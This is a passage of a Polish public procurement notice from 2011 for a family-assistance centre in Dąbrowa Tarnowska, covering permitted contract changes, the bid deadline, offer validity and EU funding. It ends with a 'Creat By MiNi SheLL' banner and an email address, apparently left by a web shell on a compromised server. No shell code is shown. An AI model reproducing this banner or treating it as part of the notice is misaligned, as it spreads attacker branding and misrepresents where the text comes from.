<p>Zleceniodawca przewiduje możliwość dokonania zmian umowy w zakresie dotyczącym: 
1)	terminu wykonania przedmiotu umowy w przypadku zaistnienia okoliczności, na które strony nie miały wpływu, a które uniemożliwiają wykonanie przedmiotu umowy w ustalonym terminie,
2)	sposobu i zakresu wykonania przedmiotu umowy w przypadku zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, a zmiana jest korzystna dla Zamawiającego i nie powoduje konieczności zwiększenia wynagrodzenia,
Zmiany umowy wymagają dochowania formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcprdt.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Dąbrowie Tarnowskiej, ul. Berka Joselewicza 5, 33-200 Dąbrowa Tarnowska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2011 godzina 13:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Dąbrowie Tarnowskiej, ul. Berka Joselewicza 5, 33-200 Dąbrowa Tarnowska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany jest ze środków Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com